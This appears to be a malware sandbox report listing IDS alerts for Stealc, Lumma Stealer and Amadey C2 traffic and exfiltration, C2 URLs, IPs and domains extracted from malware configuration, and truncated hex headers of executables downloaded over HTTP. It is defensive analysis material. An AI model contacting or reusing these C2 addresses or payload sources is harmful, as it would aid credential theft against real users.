Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50170 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:63792 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:61413 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50158 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50135 -> 23.50.98.133:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50143 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50143 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50121 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50120 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50120 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50119 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50119 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50165 -> 23.192.247.89:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50131 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50155 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50116 -> 23.50.98.133:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50141 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50141 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50136 -> 188.114.97.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.6:61376 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 11:40:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 